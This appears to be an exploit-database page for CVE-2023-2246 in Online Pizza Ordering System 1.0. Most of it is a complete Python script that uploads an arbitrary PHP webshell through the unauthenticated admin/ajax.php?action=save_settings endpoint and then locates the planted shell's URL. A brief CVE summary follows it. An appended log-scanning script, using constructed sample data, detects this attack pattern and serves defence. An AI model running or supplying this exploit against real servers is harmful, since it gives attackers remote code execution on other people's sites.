Headline
Online Pizza Ordering System 1.0 Shell Upload
Online Pizza Ordering System version 1.0 suffers from an unauthenticated remote shell upload vulnerability.
# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
# Date: 03/05/2023
# Exploit Author: URGAN
# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
# Version: v1.0
# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
# CVE: CVE-2023-2246

#!/usr/bin/env python3
# coding: utf-8

import os
import requests
import argparse
from bs4 import BeautifulSoup

# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL with http://')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
args = parser.parse_args()

# if no arguments are passed, ask the user for them
if not (args.url and args.payload):
    args.url = input('Enter URL with http://: ')
    args.payload = input('Enter file path PHP webshell: ')

# URL Variables
url = args.url + '/admin/ajax.php?action=save_settings'
img_url = args.url + '/assets/img/'
filename = os.path.basename(args.payload)

files = [
    ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
]

# send a POST request to the server
resp_upl = requests.post(url, files = files)
status_code = resp_upl.status_code
if status_code == 200:
    print('[+] File uploaded')
else:
    print(f'[-] Error {status_code}: {resp_upl.text}')
    raise SystemExit(f'[-] Script stopped due to error {status_code}.')

# send a GET request to the server
resp_find = requests.get(img_url)

# Use BeautifulSoup to parse the page's HTML code
soup = BeautifulSoup(resp_find.text, 'html.parser')

# get all <a> tags on a page
links = soup.find_all('a')

# list to store found files
found_files = []

# we go through all the links and look for the desired file by its name
for link in links:
    file_upl = link.get('href')
    if file_upl.endswith(filename): # uploaded file name
        print('[+] Uploaded file found:', file_upl)
        file_url = img_url + file_upl # get the full URL of your file
        found_files.append(file_url) # add the file to the list of found files

# if the list is not empty, then display all found files
if found_files:
    print('[+] Full URL of your file:')
    for file_url in found_files:
        print('[+] ' + file_url)
else:
    print('[-] File not found')
Related news
CVE-2023-2246
A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/ajax.php?action=save_settings. The manipulation of the argument img leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227236.
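
A defensive log check for the behaviour described above, added here as an example and not part of the original advisory or exploit: it scans Apache access-log lines for a successful POST to admin/ajax.php?action=save_settings and for requests under /assets/img/ that return something other than an image. The log lines, IP addresses and the file name constructed_upload.php are constructed sample data, and the image-extension allow-list is an assumption.

```python
import posixpath
import re

# Apache "combined" format: client, identd, user, [time], "request", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_ENDPOINT = '/admin/ajax.php?action=save_settings'  # endpoint named in the advisory
IMG_DIR = '/assets/img/'                                   # directory the uploads land in
IMAGE_EXT = {'.png', '.jpg', '.jpeg', '.gif', '.webp', '.ico'}  # assumed allow-list

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Mar/2023:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Mar/2023:10:02:10 +0000] "POST /admin/ajax.php?action=save_settings HTTP/1.1" 200 1 "-" "python-requests/2.28.1"',
    '203.0.113.9 - - [05/Mar/2023:10:02:11 +0000] "GET /assets/img/ HTTP/1.1" 200 2048 "-" "python-requests/2.28.1"',
    '203.0.113.9 - - [05/Mar/2023:10:02:15 +0000] "GET /assets/img/constructed_upload.php HTTP/1.1" 200 12 "-" "curl/7.85.0"',
    '198.51.100.7 - - [05/Mar/2023:10:03:00 +0000] "GET /assets/img/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

def find_upload_abuse(lines):
    """Return (client, kind, request_target) tuples in log order."""
    posters = set()   # clients that already POSTed to the settings endpoint
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, method, target, status = m.groups()
        if status != '200':
            continue  # only successful requests are of interest here
        path = target.split('?', 1)[0]
        if method == 'POST' and UPLOAD_ENDPOINT in target:
            # Access logs carry no session data, so every hit needs review.
            posters.add(ip)
            findings.append((ip, 'settings_post', target))
        elif method == 'GET' and IMG_DIR in path:
            name = path.rsplit(IMG_DIR, 1)[1]
            ext = posixpath.splitext(name)[1].lower()
            if name == '' and ip in posters:
                # Directory index fetched right after the upload request.
                findings.append((ip, 'dir_listing_after_post', target))
            elif name and ext not in IMAGE_EXT:
                # Something other than an image served from the image folder.
                findings.append((ip, 'non_image_fetch', target))
    return findings

if __name__ == '__main__':
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A settings_post hit alone can be a legitimate administrator saving settings; the follow-up findings from the same client are what raise its priority.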